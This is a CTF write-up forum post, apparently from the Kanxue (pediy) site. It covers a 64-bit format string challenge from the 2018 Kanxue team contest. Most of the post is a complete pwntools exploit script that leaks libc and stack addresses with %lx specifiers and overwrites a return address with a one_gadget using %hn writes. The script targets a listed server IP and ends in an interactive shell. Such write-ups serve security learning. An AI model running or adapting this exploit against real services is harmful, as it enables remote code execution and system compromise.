-
-
[原创] 看雪ctf 2018 团队赛 - 你眼中的世界
-
2018-12-27 17:08 4238
-
64bit 格式化,服务器环境貌似搞得不好,原本的fortify_source 没有用了,直接暴力写个one_gadget 就完事了
❯ nc 211.159.175.39 8686 echo from your heart lens of your word: 10 word: %n echo: lens of your word: ^C 本地------ [root@aqsv] ~/pediy ❯ ./echo_from_your_heart echo from your heart lens of your word: 10 word: %n echo: *** %n in writable segment detected *** [1] 26614 abort (core dumped) ./echo_from_your_heart
丑陋的exp = =
from pwn import * p=remote('211.159.175.39',8686) def oneloop(payload): p.sendlineafter('your word:',str(len(payload)+10)) p.sendlineafter('word:',payload) payload=''.join(['%{}$016lx '.format(str(x)) for x in range(1,39)]) oneloop(payload) leak= p.recvuntil("lens",drop=True).strip().split(' ') libcleak=int(leak[8],16)-240-0x20740 one_gadget=libcleak+0x45216 stackleak=int(leak[10],16) p.info("libcleak "+hex(libcleak)) p.info("stackleak "+hex(stackleak)) p.info("one_gadget "+hex(one_gadget)) payload='%{}c%10$hn'.format(str(-0xe0+stackleak&0xffff)) payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,10)]) oneloop(payload) payload='%{}c%36$hn'.format(str(one_gadget&0xffff)) payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,36)]) oneloop(payload) payload='%{}c%10$hn'.format(str(-0xe0+2+stackleak&0xffff)) payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,10)]) oneloop(payload) payload='%{}c%36$hhn'.format(str((one_gadget>>16)&0xffff)) payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,36)]) oneloop(payload) p.interactive()
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2018-12-28 11:43
被aqs编辑
,原因:
赞赏
他的文章
看原图